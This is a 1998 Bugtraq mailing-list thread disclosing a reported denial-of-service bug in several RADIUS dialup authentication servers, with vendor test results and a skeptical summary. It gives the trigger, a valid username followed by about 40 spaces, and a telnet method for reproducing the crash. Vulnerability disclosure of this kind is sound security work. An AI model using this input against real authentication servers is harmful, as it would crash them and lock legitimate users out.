Radius spaces-in-password DOS attack.

Date: Fri, 20 Feb 1998 21:02:53 -0500
From: "Phillip R. Jaenke" <prj@NLS.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Serious bug in "radius" dialup authentication software

At work, we've discovered a *SERIOUS* bug in the "radius" dialup
authentication software.

Affected Platforms:
WindowsNT (RadiusNT)
Linux
Solaris (x86)
BSDi
NetBSD
OpenBSD
FreeBSD

Problem:
If a user appends a certain amount of spaces after their username, Radius
will crash, keeping users from logging in. We have been unable to
determine the number of spaces, but it is above 5, and below the 'magic
128' as we call it. I'd estimate it at around 32 spaces.

Effects:
100% of the time, Radius will crash. All platforms are affected. Multiple
servers do not negate these effects, as most terminal servers, when the
primary radius authentication server is not there, will switch over to the
next one, which will get the same username, and crash, locking all
customers out. This appears to affect ALL platforms, be it WindowsNT or a
form of unix. It appears to be a bug in radius itself.

A coworker has contacted the radius mailing lists. As soon as a fix is
known, I will post it here.

--Phillip R. Jaenke (prj@raex.com | prj@nls.net)
Primary Developer, The Improvement Linux Project
Core Team Member, The Cyberian RC5 Effort - http://www.cyberian.org/
AKA Kaeyerai (Rediscovery) of MasterTechnoMonster
Ketyra Designs, Inc. - Imagine Transmeta sans Linus. That's us. :)
Date: Sat, 21 Feb 1998 13:12:37 +0100
From: "Phillip R. Jaenke" <prj@NS2.NLS.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Serious bug in "radius" dialup authentication software

>You're not telling us which radius server. Livingston 1.16 or 2.01?
>Merit? Cistron? etc (As a matter of fact I am sure Cistron is safe).

Since this is the 22nd email I've recieved on this, I decided to CC: to
bugtraq so everyone will PLEASE stop asking me this.

So far, tested servers are:
Livingston 1.16 to 2.01
RadiusNT v2.x
Merit

So far, the only one NOT vulnerable is Merit. Cistron is untested, so I've
got not idea whether or not it is. Best way to test is to telnet to a
terminal server, and login with a valid username, with 40 or more spaces
after it.

As to Cistron being safe; safe is really relative here. If somebody nasty
has your dialup numbers, then you might have to restart radius a lot.
Otherwise, there's really no security risk that I've found.

-prj

-Ed Kuchar  (InterNIC Handle: EK113)  [ekuchar@NLS.NET]
NetLink Services, Inc. 216.468.5100(Cleveland) - 330.940.2700(Akron)
sales@nls.net - http://www.nls.net - http://www.getinfo.net
Serving: Cleveland, Akron, Medina, & Geauga County
Date: Sat, 21 Feb 1998 13:01:09 +0100
From: "Phillip R. Jaenke" <prj@NS2.NLS.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Quick update on Radius bug

Just counted the spaces.

The magic number here was 40.

-prj

-Ed Kuchar  (InterNIC Handle: EK113)  [ekuchar@NLS.NET]
NetLink Services, Inc. 216.468.5100(Cleveland) - 330.940.2700(Akron)
sales@nls.net - http://www.nls.net - http://www.getinfo.net
Serving: Cleveland, Akron, Medina, & Geauga County
Date: Sun, 22 Feb 1998 13:07:55 -0600
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: RADIUS (Summary)

This is a summary of reports about the radius vulnerability that
Phillip R. Jaenke reported. Giving the large number of people that
have reported that they are not vulnerable I must wonder what is
unique in Phillip's environment that is causing this. Only one person
reported Merit RADIUS being vulnerable and that has not been
confirmed yet.

So far reported not vulnerable:

Merit 2.4.23C,
Livingston RADIUS  2.0.1 97/5/22
Livingstons RADIUS 2.01
Perl RADIUS module
MacRADIUS
ESVA Radius

Reported vulnerable:

Livingston 1.16 to 2.01 (Phillip R. Jaenke)
RadiusNT v2.x (Phillip R. Jaenke)
merit radius 2.4.23C (jbeley@puma.sirinet.net)

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01